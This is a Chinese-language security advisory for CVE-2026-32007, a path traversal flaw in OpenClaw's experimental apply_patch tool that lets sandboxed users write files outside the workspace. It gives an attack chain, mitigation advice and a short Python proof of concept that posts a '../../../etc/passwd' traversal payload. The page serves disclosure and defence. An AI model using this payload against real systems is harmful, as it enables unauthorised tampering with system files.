CVE-2026-32007 CVSS 6.8 中危

CVE-2026-32007 OpenClaw路径遍历漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32007

漏洞类型

路径遍历

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.23之前版本的实验性`apply_patch`工具中存在路径遍历漏洞。由于对挂载路径执行仅工作区检查时存在不一致性，拥有沙箱访问权限的攻击者可以利用此漏洞修改工作区目录之外的文件。攻击者能够通过在工作区根目录之外的可写挂载上执行`apply_patch`操作，从而访问并修改系统上的任意文件，导致机密性和完整性受损。

技术细节

该漏洞源于OpenClaw实验性工具`apply_patch`中的安全验证逻辑缺陷。在处理补丁应用请求时，系统试图限制操作范围仅限于工作区目录，但在处理挂载路径时，这种限制的实施存在不一致性。具体来说，攻击者若拥有沙箱环境的访问权限，可以利用特定的挂载配置，绕过“仅限工作区”的检查机制。通过构造恶意的补丁操作，攻击者可以将目标指向工作区根目录之外的可写挂载点。由于验证机制未能正确拦截此类路径，攻击者便能够在宿主机或受限区域之外写入任意数据。这种攻击方式本质上是一种沙箱逃逸与路径遍历的结合，允许低权限用户在未经授权的情况下修改关键系统文件。

攻击链分析

STEP 1

步骤1：获取沙箱访问权限

攻击者获取OpenClaw实例的沙箱低权限访问账户（PR:L）。

STEP 2

步骤2：识别可写挂载点

攻击者在沙箱环境中探测位于工作区之外的可写挂载路径。

STEP 3

步骤3：构造恶意补丁请求

攻击者利用`apply_patch`工具，构造包含路径遍历序列（如../）的请求，目标指向外部挂载点。

STEP 4

步骤4：执行文件修改

由于检查机制不一致，系统处理该请求，导致工作区外的任意文件被修改或写入。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-32007
# Description: Exploiting path traversal in OpenClaw apply_patch tool

import requests

target_url = "http://target-openclaw-instance/api/apply_patch"
# Attacker controls the patch content and target path
# The vulnerability allows targeting mounted paths outside workspace

payload = {
    "patch_content": "malicious_code_or_data",
    # Traversal sequence to escape workspace
    "target_path": "../../../etc/passwd"  # or a writable mount point
}

# Send request to apply the patch
response = requests.post(target_url, json=payload)

if response.status_code == 200:
    print("Patch applied successfully. Arbitrary file write likely occurred.")
else:
    print("Exploit failed.")

影响范围

OpenClaw < 2026.2.23

防御指南

临时缓解措施

建议立即升级至OpenClaw 2026.2.23或更高版本以修复此漏洞。如果无法立即升级，应禁用实验性的`apply_patch`工具，并严格限制沙箱环境的挂载权限，确保不可信用户无法访问可写的外部挂载点。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表